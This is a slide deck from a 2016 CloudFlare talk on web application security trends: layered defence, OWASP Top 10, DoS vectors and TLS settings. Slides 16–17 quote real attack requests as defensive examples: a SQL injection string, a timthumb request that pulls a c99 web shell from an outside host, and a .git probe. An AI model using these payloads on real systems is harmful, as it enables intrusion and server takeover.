Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Latest Trends in Web Application Security

18,668 views

Published on

Hear the talk on YouTube: https://www.youtube.com/watch?v=lp4dQTSH130

Web Application Firewall security is evolving. Join John Graham-Cumming, CTO of CloudFlare, as he shares the latest trends and changes in Web Application Security. This talk will give details of the big trends in web application security seen in 2015, and how to defend against these threats and talk about the evolving web application security landscape.

Published in: Technology
  • Be the first to comment

Latest Trends in Web Application Security

  1. 1. Web Application Security John Graham-Cumming |Chief Technology Officer, CloudFlare March 2016
  2. 2. Agenda • Layered Web Application Security • 2015 Top Web Application Attack Techniques • Kitchen Sink Attacks • TLS 2
  3. 3. Introduction
  4. 4. Our mission Help build a better Internet 4
  5. 5. Standards/PlatformAvailabilitySecurity Performance Running applications on the Internet is challenging 5 “Hundreds of dollars a month for private hosting and it was still reliably crashing on or around decision day.” “We're seeing some customers that are connecting to ixl.com via IPv6, which we are not equipped to handle.” “The first flood of attack traffic was mitigated with some blocking techniques implemented by our CDN, but when the attack got more creative there was nothing more they could do.” “Because our servers were only located in the U.S. at that time, some of our customers from other parts of the world were experiencing slower loading of the widget.”
  6. 6. We solve the challenges of the Internet 6 • Analytics • IPv6 gateway • DNSSEC • Google SPDY + HTTP2 • Apps platform Standards/Platform • Load balancing • Always online • Redundant, Anycast network Availability • Reputation-based security • Distributed denial of service (DDoS) mitigation • Firewall • Secure socket layer (SSL) • Malware detection Security • Content delivery (CDN) • Authoritative DNS • Web content optimization (WCO) • Front-end / mobile optimization • Railgun™ WAN optimizer Performance
  7. 7. 7
  8. 8. Layered Web Application Security
  9. 9. What attackers attack • Web applications themselves • e.g. attempted SQL injection • e.g. DoS by hitting CPU expensive URI • Web servers • Attempted access to files on machines • SYN flooding to overwhelm TCP buffers • Related infrastructure • Authoratitive DNS for a domain / DNS poisoning • Domain registration 9
  10. 10. Layered Defense • Secure Coding Practices • Web Application Firewall • Can protect against application level attacks • Use one that can be customized for your application • DoS mitigation service • DNS service that has withstood large DoS attacks • DNSSEC • A domain registrar with robust security policies to prevent transfer 10
  11. 11. Buying Time • A WAF buys time to patch vulnerabilities • Common to see vulnerabilities announced along with patches • But how long does it take to patch 11
  12. 12. Examples • December 14, 2015 CVE-2015-8562 • Joomla CMS Unserialize Vulnerability • Released without a patch • April 25, 2015 SUPEE-5344 • Magento RCE Vulnerability • April 15, 2015 CVE-2015-1635 • Windows Server RCE Vulnerability 12
  13. 13. 2015 Top Web Application Attack Techniques
  14. 14. OWASP Top 10 in 2015 1. A5 Security Misconfiguration 2. A9 Using Components with Known Vulnerabilities 3. A6 Sensitive Data Exposure 4. A4 Insecure Direct Object References 5. A1 Injection 6. A3 XSS 7. A7 Missing Function Level Access Control 8. A8 Cross Site Request Forgery 9. A10 Unvalidated Redirects and Forwards 10. A2 Weak authentication and session management 14
  15. 15. Common Web DoS Vectors • Requests without a user agent • Drop requests that have no User-Agent field • WordPress pingback attacks • Drop WordPress pingbacks • Fake user agent • Validate User-Agent to identify real browsers 15
  16. 16. Common Web DoS Vectors • Faulty data sanitization /skin/interface/auth.php?&PASSWORD=1&USER_ID=%df'%20and%20(select% 201%20from%20(select%20 count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20us er%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema. tables%20group%20by%20x)a)%232. • Exploitation of timthumb for RCE GET /wp-content/themes/thumb.php?src=http://dsf2kh34as.co/c99.php 16
  17. 17. Common Web DoS Vectors • Incorrect SCM data access GET /.git/HEAD HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0) 17
  18. 18. Kitchen Sink Attacks
  19. 19. Everything they’ve got • Common to see attackers try multiple vectors to bring down a web site 1. Simultaneous SYN flood, DNS reflection attack, and authoratitive DNS attack 2. Using multiple layer 7 (HTTP/HTTPS) botnets at the same time 3. 1 and 2 19
  20. 20. Typical DoS volume at CloudFlare 20
  21. 21. Recent 400 Gbps DoS attacks 21
  22. 22. TLS
  23. 23. 23
  24. 24. 24 DROWN March 1 2016
  25. 25. CloudFlare’s TLS Configuration • Public and on Github https://github.com/cloudflare/sslconfig ssl_protocols TLSv1 TLSv1.1 TLSv1.2; ssl_ciphers EECDH+CHACHA20:EECDH+CHACHA20- draft:EECDH+AES128:RSA+AES128:EECDH+AES256:RSA+AES256:EECDH+3DES:R SA+3DES:!MD5; ssl_prefer_server_ciphers on; 25
  26. 26. Conclusion
  27. 27. Conclusion • Layered Defense • Patch but use a WAF to buy time • Stay on top of TLS 27

×